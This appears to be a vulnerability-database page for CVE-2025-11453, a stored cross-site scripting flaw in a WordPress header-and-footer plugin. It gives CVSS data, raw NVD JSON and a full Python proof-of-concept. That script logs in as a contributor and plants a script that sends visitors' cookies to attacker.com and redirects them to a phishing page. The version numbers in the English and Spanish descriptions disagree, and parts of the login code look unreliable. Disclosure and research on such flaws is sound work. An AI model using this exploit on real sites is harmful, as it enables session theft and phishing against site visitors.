Security Vulnerability Report
中文
CVE-2025-11453 CVSS 6.4 MEDIUM

CVE-2025-11453

Published: 2026-01-09 12:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Header and Footer Scripts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _inpost_head_script parameter in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Header and Footer Scripts插件 <= 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11453 PoC - Stored XSS in Header and Footer Scripts plugin # Author: Security Researcher # Target: WordPress with Header and Footer Scripts plugin <= 2.3.0 import requests from bs4 import BeautifulSoup import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_contributor" PASSWORD = "attacker_password" def get_csrf_token(session, url): """Extract CSRF token from WordPress login page""" response = session.get(f"{url}/wp-login.php") soup = BeautifulSoup(response.text, 'html.parser') token = soup.find('input', {'name': 'wpnonce'}) return token['value'] if token else None def login_wordpress(session, username, password): """Authenticate to WordPress as contributor user""" csrf_token = get_csrf_token(session, TARGET_URL) login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f'{TARGET_URL}/wp-admin/', 'wpnonce': csrf_token } response = session.post(f"{TARGET_URL}/wp-login.php", data=login_data) return 'wordpress_logged_in' in str(session.cookies) def inject_xss_payload(session): """Inject stored XSS payload via _inpost_head_script parameter""" # Create or edit a post post_url = f"{TARGET_URL}/wp-admin/post-new.php" response = session.get(post_url) # Extract nonce for post creation soup = BeautifulSoup(response.text, 'html.parser') nonce_tag = soup.find('input', {'id': '_wpnonce'}) post_nonce = nonce_tag['value'] if nonce_tag else None # XSS payload - steals cookies and redirects to attacker xss_payload = '''<script>fetch('https://attacker.com/steal?c='+document.cookie);document.location='https://attacker.com/phishing';</script>''' post_data = { 'post_title': 'XSS Test Page', 'content': 'This page contains stored XSS', '_inpost_head_script': xss_payload, 'post_type': 'post', 'action': 'editpost', '_wpnonce': post_nonce } response = session.post(post_url, data=post_data) print(f"[+] XSS payload injected successfully!") print(f"[+] Visit the created post to trigger the payload") def main(): session = requests.Session() print("[*] CVE-2025-11453 - Header and Footer Scripts Stored XSS") print("[*] Target: WordPress + Header and Footer Scripts <= 2.3.0") if login_wordpress(session, USERNAME, PASSWORD): print("[+] Login successful as contributor") inject_xss_payload(session) else: print("[-] Login failed") sys.exit(1) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11453", "sourceIdentifier": "[email protected]", "published": "2026-01-09T12:15:50.620", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Header and Footer Scripts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _inpost_head_script parameter in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Header and Footer Scripts para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del parámetro _inpost_head_script en todas las versiones hasta la 2.2.2, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite que atacantes autenticados, con acceso de nivel Colaborador o superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/header-and-footer-scripts/tags/2.2.2/shfs.php#L119", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3442622%40header-and-footer-scripts&new=3442622%40header-and-footer-scripts&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3444257%40header-and-footer-scripts&new=3444257%40header-and-footer-scripts&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d658e087-8cc7-4653-af3c-407b6f73fb7b?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.